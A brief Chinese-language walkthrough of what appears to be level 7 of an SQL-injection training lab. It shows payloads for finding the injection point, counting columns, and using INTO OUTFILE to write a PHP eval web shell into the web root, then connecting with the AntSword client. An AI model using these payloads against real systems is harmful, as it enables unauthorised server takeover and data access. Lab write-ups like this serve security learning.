一.判断闭合点
闭合点为?id=1'))--+
二.判断列数
输入?id=1')) order by 3--+页面正常
输入?id=1')) order by 4--+页面异常,说明有3列
这里显示让我们用outfile来打这关,那我们先了解一下outfile:
用法:select 列名 from table [where语句] into outfile '目标文件'
三.写入木马文件
输入?id=-1')) union select 1,2,3 into outfile "D:/phpstudy/phpstudy_pro/WWW/1.txt"--+测试一下是否能把文件写进去
在这里发现写进来以后,就可以写我们的木马文件
输入?id=-1')) union select 1,2,'<?php eval($_post['cmd'])?>' into outfile "D:/phpstudy/phpstudy_pro/WWW/1.php"--+
这样就把我们的木马文件写进来了,我们打开蚁剑连接
连上蚁剑就获得了他的数据库的管理权限了,以上就是第七关的通关攻略